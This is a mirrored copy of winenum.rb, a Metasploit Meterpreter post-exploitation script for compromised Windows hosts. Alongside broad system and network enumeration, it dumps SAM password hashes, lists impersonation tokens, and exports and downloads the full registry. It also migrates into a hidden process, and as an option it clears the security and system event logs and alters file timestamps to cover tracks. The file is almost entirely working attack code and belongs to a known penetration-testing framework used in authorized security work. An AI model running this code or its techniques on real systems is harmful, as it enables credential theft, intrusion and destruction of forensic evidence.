Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

winenum.rb 20KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
  8. ################## Variable Declarations ##################
  9. @client = client
  10. opts = Rex::Parser::Arguments.new(
  11. "-h" => [ false, "Help menu." ],
  12. "-m" => [ false, "Migrate the Meterpreter Session from it current process to a new cmd.exe before doing anything" ],
  13. "-r" => [ false, "Dump, compress and download entire Registry" ],
  14. "-c" => [ false, "Change Access, Modified and Created times of executables that were run on the target machine and clear the EventLog" ]
  15. )
  16. rd = nil
  17. mg = nil
  18. cm = nil
  19. opts.parse(args) { |opt, idx, val|
  20. case opt
  21. when '-r'
  22. rd = 1
  23. when '-m'
  24. mg = 1
  25. when '-c'
  26. cm = 1
  27. when "-h"
  28. print_line "WinEnum -- Windows local enumeration"
  29. print_line
  30. print_line "Retrieves all kinds of information about the system"
  31. print_line "including environment variables, network interfaces,"
  32. print_line "routing, user accounts, and much more. Results are"
  33. print_line "stored in #{::File.join(Msf::Config.log_directory,'scripts', 'winenum')}"
  34. print_line(opts.usage)
  35. raise Rex::Script::Completed
  36. end
  37. }
  38. #-------------------------------------------------------------------------------
  39. host,port = @client.session_host, @client.session_port
  40. info = @client.sys.config.sysinfo
  41. # Create Filename info to be appended to downloaded files
  42. filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
  43. # Create a directory for the logs
  44. logs = ::File.join(Msf::Config.log_directory,'scripts', 'winenum',Rex::FileUtils.clean_path(info['Computer'] + filenameinfo))
  45. @logfol = logs
  46. # Create the log directory
  47. ::FileUtils.mkdir_p(logs)
  48. #log file name
  49. @dest = logs + "/" + Rex::FileUtils.clean_path(info['Computer'] + filenameinfo) + ".txt"
  50. # Commands that will be ran on the Target
  51. commands = [
  52. 'cmd.exe /c set',
  53. 'arp -a',
  54. 'ipconfig /all',
  55. 'ipconfig /displaydns',
  56. 'route print',
  57. 'net view',
  58. 'netstat -nao',
  59. 'netstat -vb',
  60. 'netstat -ns',
  61. 'net accounts',
  62. 'net accounts /domain',
  63. 'net session',
  64. 'net share',
  65. 'net group',
  66. 'net user',
  67. 'net localgroup',
  68. 'net localgroup administrators',
  69. 'net group administrators',
  70. 'net view /domain',
  71. 'netsh firewall show config',
  72. 'tasklist /svc',
  73. 'tasklist /m',
  74. 'gpresult /SCOPE COMPUTER /Z',
  75. 'gpresult /SCOPE USER /Z'
  76. ]
  77. # Windows 2008 Commands
  78. win2k8cmd = [
  79. 'servermanagercmd.exe -q',
  80. 'cscript /nologo winrm get winrm/config',
  81. ]
  82. # Commands that MACE will be changed
  83. cmdstomp = [
  84. 'cmd.exe',
  85. 'reg.exe',
  86. 'ipconfig.exe',
  87. 'route.exe',
  88. 'net.exe',
  89. 'netstat.exe',
  90. 'netsh.exe',
  91. 'makecab.exe',
  92. 'tasklist.exe',
  93. 'wbem\\wmic.exe',
  94. 'gpresult.exe'
  95. ]
  96. # WMIC Commands that will be executed on the Target
  97. wmic = [
  98. 'useraccount list',
  99. 'group list',
  100. 'service list brief',
  101. 'volume list brief',
  102. 'logicaldisk get description,filesystem,name,size',
  103. 'netlogin get name,lastlogon,badpasswordcount',
  104. 'netclient list brief',
  105. 'netuse get name,username,connectiontype,localname',
  106. 'share get name,path',
  107. 'nteventlog get path,filename,writeable',
  108. 'process list brief',
  109. 'startup list full',
  110. 'rdtoggle list',
  111. 'product get name,version',
  112. 'qfe',
  113. ]
  114. #Specific Commands for Windows vista for Wireless Enumeration
  115. vstwlancmd = [
  116. 'netsh wlan show interfaces',
  117. 'netsh wlan show drivers',
  118. 'netsh wlan show profiles',
  119. 'netsh wlan show networks mode=bssid',
  120. ]
  121. # Commands that are not present in Windows 2000
  122. nonwin2kcmd = [
  123. 'netsh firewall show config',
  124. 'tasklist /svc',
  125. 'gpresult /SCOPE COMPUTER /Z',
  126. 'gpresult /SCOPE USER /Z',
  127. 'prnport -l',
  128. 'prnmngr -g',
  129. 'tasklist.exe',
  130. 'wbem\\wmic.exe',
  131. 'netsh.exe',
  132. ]
  133. # Executables not pressent in Windows 2000
  134. nowin2kexe = [
  135. 'netsh.exe',
  136. 'gpresult.exe',
  137. 'tasklist.exe',
  138. 'wbem\\wmic.exe',
  139. ]
  140. ################## Function Declarations ##################
  141. def findprogs()
  142. print_status("Extracting software list from registry")
  143. proglist = ""
  144. threadnum = 0
  145. a = []
  146. appkeys = ['HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
  147. 'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' ]
  148. appkeys.each do |keyx86|
  149. soft_keys = registry_enumkeys(keyx86)
  150. if soft_keys
  151. soft_keys.each do |k|
  152. if threadnum < 10
  153. a.push(::Thread.new {
  154. begin
  155. dispnm = registry_getvaldata("#{keyx86}\\#{k}","DisplayName")
  156. dispversion = registry_getvaldata("#{keyx86}\\#{k}","DisplayVersion")
  157. proglist << "#{dispnm},#{dispversion}"
  158. rescue
  159. end
  160. })
  161. threadnum += 1
  162. else
  163. sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
  164. threadnum = 0
  165. end
  166. end
  167. end
  168. end
  169. file_local_write("#{@logfol}/programs_list.csv",proglist)
  170. end
  171. # Function to check if Target Machine a VM
  172. # Note: will add soon Hyper-v and Citrix Xen check.
  173. def chkvm()
  174. check = nil
  175. vmout = ''
  176. info = @client.sys.config.sysinfo
  177. print_status "Checking if #{info['Computer']} is a Virtual Machine ........"
  178. # Check for Target Machines if running in VM, only fo VMware Workstation/Fusion
  179. begin
  180. key = 'HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS'
  181. root_key, base_key = @client.sys.registry.splitkey(key)
  182. open_key = @client.sys.registry.open_key(root_key,base_key,KEY_READ)
  183. v = open_key.query_value('SystemManufacturer')
  184. sysmnfg = v.data.downcase
  185. if sysmnfg =~ /vmware/
  186. print_status "\tThis is a VMware Workstation/Fusion Virtual Machine"
  187. vmout << "This is a VMware Workstation/Fusion Virtual Machine\n\n"
  188. check = 1
  189. elsif sysmnfg =~ /xen/
  190. print_status("\tThis is a Xen Virtual Machine.")
  191. check = 1
  192. end
  193. rescue
  194. end
  195. if check != 1
  196. begin
  197. #Registry path using the HD and CD rom entries in the registry in case propirtary tools are
  198. #not installed.
  199. key2 = "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0"
  200. root_key2, base_key2 = @client.sys.registry.splitkey(key2)
  201. open_key2 = @client.sys.registry.open_key(root_key2,base_key2,KEY_READ)
  202. v2 = open_key2.query_value('Identifier')
  203. if v2.data.downcase =~ /vmware/
  204. print_status "\tThis is a VMWare virtual Machine"
  205. vmout << "This is a VMWare virtual Machine\n\n"
  206. elsif v2.data =~ /vbox/
  207. print_status "\tThis is a Sun VirtualBox virtual Machine"
  208. vmout << "This is a Sun VirtualBox virtual Machine\n\n"
  209. elsif v2.data.downcase =~ /xen/
  210. print_status "\tThis is a Xen virtual Machine"
  211. vmout << "This is a Xen virtual Machine\n\n"
  212. elsif v2.data.downcase =~ /virtual hd/
  213. print_status "\tThis is a Hyper-V/Virtual Server virtual Machine"
  214. vmout << "This is a Hyper-v/Virtual Server virtual Machine\n\n"
  215. end
  216. rescue::Exception => e
  217. end
  218. end
  219. vmout
  220. end
  221. #-------------------------------------------------------------------------------
  222. # Function for running a list a commands stored in a array, return string
  223. def list_exec(cmdlst)
  224. print_status("Running Command List ...")
  225. i = 0
  226. a =[]
  227. @client.response_timeout=120
  228. cmdlst.each do |cmd|
  229. if i < 10
  230. a.push(::Thread.new {
  231. r,cmdout='',""
  232. print_status "\trunning command #{cmd}"
  233. r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
  234. while(d = r.channel.read)
  235. cmdout << d
  236. file_local_write("#{@logfol}/#{cmd.gsub(/(\W)/,"_")}.txt",cmdout)
  237. end
  238. cmdout = ""
  239. r.channel.close
  240. r.close
  241. })
  242. i += 1
  243. else
  244. sleep(0.10) and a.delete_if {|x| not x.alive?} while not a.empty?
  245. i = 0
  246. end
  247. end
  248. a.delete_if {|x| not x.alive?} while not a.empty?
  249. end
  250. #-------------------------------------------------------------------------------
  251. # Function for running a list of WMIC commands stored in a array, returns string
  252. def wmicexec(wmiccmds= nil)
  253. print_status("Running WMIC Commands ....")
  254. i, a = 0, []
  255. @client.response_timeout=120
  256. begin
  257. tmp = @client.sys.config.getenv('TEMP')
  258. wmiccmds.each do |wmi|
  259. if i < 10
  260. a.push(::Thread.new {
  261. tmpout = ''
  262. wmicfl = tmp + "\\#{sprintf("%.5d",rand(100000))}.csv"
  263. print_status "\trunning command wmic #{wmi}"
  264. flname = "#{@logfol}/wmic_#{wmi.gsub(/(\W)/,"_")}.csv"
  265. r = @client.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi} /format:csv", nil, {'Hidden' => true})
  266. sleep(2)
  267. #Making sure that WMIC finishes before executing next WMIC command
  268. prog2check = "wmic.exe"
  269. found = 0
  270. while found == 0
  271. @client.sys.process.get_processes().each do |x|
  272. found =1
  273. if prog2check == (x['name'].downcase)
  274. sleep(0.5)
  275. found = 0
  276. end
  277. end
  278. end
  279. r.close
  280. # Read output of WMIC
  281. wmioutfile = @client.fs.file.new(wmicfl, "rb")
  282. until wmioutfile.eof?
  283. tmpout << wmioutfile.read
  284. end
  285. wmioutfile.close
  286. # Create file with output of command
  287. filewrt(flname,tmpout)
  288. # Delete created file on disk
  289. begin
  290. @client.fs.file.rm(wmicfl)
  291. rescue
  292. end
  293. })
  294. i += 1
  295. else
  296. sleep(0.01) and a.delete_if {|x| not x.alive?} while not a.empty?
  297. i = 0
  298. end
  299. end
  300. a.delete_if {|x| not x.alive?} while not a.empty?
  301. rescue ::Exception => e
  302. print_status("Error running WMIC commands: #{e.class} #{e}")
  303. end
  304. end
  305. #-------------------------------------------------------------------------------
  306. #Function for getting the NTLM and LANMAN hashes out of a system
  307. def gethash()
  308. print_status("Dumping password hashes...")
  309. begin
  310. hash = ''
  311. @client.core.use("priv")
  312. select(nil, nil, nil, 3)
  313. hashes = @client.priv.sam_hashes
  314. hashes.each do |h|
  315. hash << h.to_s+"\n"
  316. end
  317. hash << "\n\n\n"
  318. print_status("Hashes Dumped")
  319. rescue ::Exception => e
  320. print_status("\tError dumping hashes: #{e.class} #{e}")
  321. print_status("\tPayload may be running with insuficient privileges!")
  322. end
  323. flname = "#{@logfol}/hashdump.txt"
  324. file_local_write(flname,hash)
  325. end
  326. #-------------------------------------------------------------------------------
  327. #Function that uses the incognito features to list tokens on the system that can be used
  328. def listtokens()
  329. begin
  330. print_status("Getting Tokens...")
  331. dt = ''
  332. @client.core.use("incognito")
  333. i = 0
  334. dt << "****************************\n"
  335. dt << " List of Available Tokens\n"
  336. dt << "****************************\n\n"
  337. while i < 2
  338. tokens = @client.incognito.incognito_list_tokens(i)
  339. if i == 0
  340. tType = "User"
  341. else
  342. tType = "Group"
  343. end
  344. dt << "#{tType} Delegation Tokens Available \n"
  345. dt << "======================================== \n"
  346. tokens['delegation'].each_line{ |string|
  347. dt << string + "\n"
  348. }
  349. dt << "\n"
  350. dt << "#{tType} Impersonation Tokens Available \n"
  351. dt << "======================================== \n"
  352. tokens['impersonation'].each_line{ |string|
  353. dt << string + "\n"
  354. }
  355. i += 1
  356. break if i == 2
  357. end
  358. print_status("All tokens have been processed")
  359. rescue ::Exception => e
  360. print_status("Error Getting Tokens: #{e.class} #{e}")
  361. end
  362. file_local_write("#{@logfol}/tokens.txt",dt)
  363. end
  364. #-------------------------------------------------------------------------------
  365. # Function for clearing all event logs
  366. def clrevtlgs()
  367. evtlogs = [
  368. 'security',
  369. 'system',
  370. 'application',
  371. 'directory service',
  372. 'dns server',
  373. 'file replication service'
  374. ]
  375. print_status("Clearing Event Logs, this will leave and event 517")
  376. begin
  377. evtlogs.each do |evl|
  378. print_status("\tClearing the #{evl} Event Log")
  379. log = @client.sys.eventlog.open(evl)
  380. log.clear
  381. file_local_write(@dest,"Cleared the #{evl} Event Log")
  382. end
  383. print_status("All Event Logs have been cleared")
  384. rescue ::Exception => e
  385. print_status("Error clearing Event Log: #{e.class} #{e}")
  386. end
  387. end
  388. #-------------------------------------------------------------------------------
  389. # Function for Changing Access Time, Modified Time and Created Time of Files Supplied in an Array
  390. # The files have to be in %WinDir%\System32 folder.
  391. def chmace(cmds)
  392. windir = ''
  393. print_status("Changing Access Time, Modified Time and Created Time of Files Used")
  394. windir = @client.sys.config.getenv('WinDir')
  395. cmds.each do |c|
  396. begin
  397. @client.core.use("priv")
  398. filetostomp = windir + "\\system32\\"+ c
  399. fl2clone = windir + "\\system32\\chkdsk.exe"
  400. print_status("\tChanging file MACE attributes on #{filetostomp}")
  401. @client.priv.fs.set_file_mace_from_file(filetostomp, fl2clone)
  402. file_local_write(@dest,"Changed MACE of #{filetostomp}")
  403. rescue ::Exception => e
  404. print_status("Error changing MACE: #{e.class} #{e}")
  405. end
  406. end
  407. end
  408. #-------------------------------------------------------------------------------
  409. #Dumping and Downloading the Registry of the target machine
  410. def regdump(pathoflogs,filename)
  411. host,port = @client.session_host, @client.session_port
  412. #This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
  413. garbage = ''
  414. hives = %w{HKCU HKLM HKCC HKCR HKU}
  415. windir = @client.sys.config.getenv('WinDir')
  416. print_status('Dumping and Downloading the Registry')
  417. hives.each do |hive|
  418. begin
  419. print_status("\tExporting #{hive}")
  420. r = @client.sys.process.execute("cmd.exe /c reg.exe export #{hive} #{windir}\\Temp\\#{hive}#{filename}.reg", nil, {'Hidden' => 'true','Channelized' => true})
  421. while(d = r.channel.read)
  422. garbage << d
  423. end
  424. r.channel.close
  425. r.close
  426. print_status("\tCompressing #{hive} into cab file for faster download")
  427. r = @client.sys.process.execute("cmd.exe /c makecab #{windir}\\Temp\\#{hive}#{filename}.reg #{windir}\\Temp\\#{hive}#{filename}.cab", nil, {'Hidden' => 'true','Channelized' => true})
  428. while(d = r.channel.read)
  429. garbage << d
  430. end
  431. r.channel.close
  432. r.close
  433. rescue ::Exception => e
  434. print_status("Error dumping Registry Hives #{e.class} #{e}")
  435. end
  436. end
  437. #Downloading compressed registry Hives
  438. hives.each do |hive|
  439. begin
  440. print_status("\tDownloading #{hive}#{filename}.cab to -> #{pathoflogs}/#{host}-#{hive}#{filename}.cab")
  441. @client.fs.file.download_file("#{pathoflogs}/#{host}-#{hive}#{filename}.cab", "#{windir}\\Temp\\#{hive}#{filename}.cab")
  442. file_local_write(@dest,"Dumped and Downloaded #{hive} Registry Hive")
  443. sleep(5)
  444. rescue ::Exception => e
  445. print_status("Error Downloading Registry Hives #{e.class} #{e}")
  446. end
  447. end
  448. #Deleting left over files
  449. print_status("\tDeleting left over files")
  450. @client.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'})
  451. end
  452. #-------------------------------------------------------------------------------
  453. # Function that will call 2 other Functions to cover all tracks
  454. def covertracks(cmdstomp)
  455. clrevtlgs()
  456. info = @client.sys.config.sysinfo
  457. trgtos = info['OS']
  458. if trgtos =~ /(Windows 2000)/
  459. chmace(cmdstomp - nonwin2kcmd)
  460. else
  461. chmace(cmdstomp)
  462. end
  463. end
  464. #-------------------------------------------------------------------------------
  465. # Functions Provided by natron (natron 0x40 invisibledenizen 0x2E com)
  466. # for Process Migration
  467. #---------------------------------------------------------------------------------------------------------
  468. def launchProc(target)
  469. print_status("Launching hidden #{target}...")
  470. # Set the vars; these can of course be modified if need be
  471. cmd_exec = target
  472. cmd_args = nil
  473. hidden = true
  474. channelized = nil
  475. use_thread_token = false
  476. # Launch new process
  477. newproc = @client.sys.process.execute(cmd_exec, cmd_args,
  478. 'Channelized' => channelized,
  479. 'Hidden' => hidden,
  480. 'InMemory' => nil,
  481. 'UseThreadToken' => use_thread_token)
  482. print_status("Process #{newproc.pid} created.")
  483. return newproc
  484. end
  485. #-------------------------------------------------------------------------------
  486. def migrateToProc(newproc)
  487. # Grab the current pid info
  488. server = @client.sys.process.open
  489. print_status("Current process is #{server.name} (#{server.pid}). Migrating to #{newproc.pid}.")
  490. # Save the old process info so we can kill it after migration.
  491. oldproc = server.pid
  492. # Do the migration
  493. @client.core.migrate(newproc.pid.to_i)
  494. print_status("Migration completed successfully.")
  495. # Grab new process info
  496. server = @client.sys.process.open
  497. print_status("New server process: #{server.name} (#{server.pid})")
  498. return oldproc
  499. end
  500. #-------------------------------------------------------------------------------
  501. def killApp(procpid)
  502. @client.sys.process.kill(procpid)
  503. print_status("Old process #{procpid} killed.")
  504. end
  505. #---------------------------------------------------------------------------------------------------------
  506. # Function to execute process migration
  507. def migrate()
  508. target = 'cmd.exe'
  509. newProcPid = launchProc(target)
  510. oldProc = migrateToProc(newProcPid)
  511. #killApp(oldProc)
  512. #Dangerous depending on the service exploited
  513. end
  514. #---------------------------------------------------------------------------------------------------------
  515. #Function for Checking for UAC
  516. def uaccheck()
  517. uac = is_uac_enabled?
  518. if uac
  519. print_status("\tUAC is Enabled")
  520. else
  521. print_status("\tUAC is Disabled")
  522. end
  523. return uac
  524. end
  525. #check for proper Meterpreter Platform
  526. def unsupported
  527. print_error("This version of Meterpreter is not supported with this Script!")
  528. raise Rex::Script::Completed
  529. end
  530. unsupported if client.platform != 'windows'
  531. ################## MAIN ##################
  532. # Execute Functions selected
  533. if (mg != nil)
  534. migrate()
  535. end
  536. # Main part of script, it will run all function minus the ones
  537. # that will chance the MACE and Clear the Event log.
  538. print_status("Running Windows Local Enumeration Meterpreter Script")
  539. print_status("New session on #{host}:#{port}...")
  540. # Header for File that will hold all the output of the commands
  541. info = @client.sys.config.sysinfo
  542. header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
  543. header << "Running as: #{@client.sys.config.getuid}\n"
  544. header << "Host: #{info['Computer']}\n"
  545. header << "OS: #{info['OS']}\n"
  546. header << "\n\n\n"
  547. print_status("Saving general report to #{@dest}")
  548. print_status("Output of each individual command is saved to #{@logfol}")
  549. file_local_write(@dest,header)
  550. file_local_write(@dest,chkvm())
  551. trgtos = info['OS']
  552. uac = uaccheck()
  553. # Run Commands according to OS some commands are not available on all versions of Windows
  554. if trgtos =~ /(Windows XP)/
  555. if trgtos =~ /(2600, \)|2600, Service Pack 1\))/
  556. commands.delete('netstat -vb')
  557. commands.delete('netsh firewall show config')
  558. end
  559. list_exec(commands)
  560. wmicexec(wmic)
  561. findprogs()
  562. gethash()
  563. elsif trgtos =~ /(Windows .NET)/
  564. list_exec(commands)
  565. wmicexec(wmic)
  566. findprogs()
  567. gethash()
  568. elsif trgtos =~ /(Windows 2008)/
  569. list_exec(commands + win2k8cmd)
  570. wmicexec(wmic)
  571. findprogs()
  572. if not is_system?
  573. print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.")
  574. else
  575. gethash()
  576. end
  577. elsif trgtos =~ /Windows (Vista|7)/
  578. list_exec(commands + vstwlancmd)
  579. # Check for UAC and save results
  580. if uac
  581. file_local_write(@dest,"UAC is Enabled")
  582. else
  583. file_local_write(@dest,"UAC is Disabled")
  584. end
  585. wmicexec(wmic)
  586. findprogs()
  587. if not is_system?
  588. print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.")
  589. else
  590. gethash()
  591. end
  592. elsif trgtos =~ /(Windows 2000)/
  593. list_exec(commands - nonwin2kcmd)
  594. gethash()
  595. end
  596. listtokens()
  597. if (rd != nil)
  598. if not uac
  599. regdump(logs,filenameinfo)
  600. else
  601. print_status("UAC is enabled, Registry Keys could not be dumped under current privileges")
  602. end
  603. end
  604. if (cm != nil)
  605. if trgtos =~ /(Windows 2000)/
  606. covertracks(cmdstomp - nowin2kexe)
  607. else
  608. if not uac
  609. covertracks(cmdstomp)
  610. else
  611. print_status("UAC is enabled, Logs could not be cleared under current privileges")
  612. end
  613. end
  614. end
  615. print_status("Done!")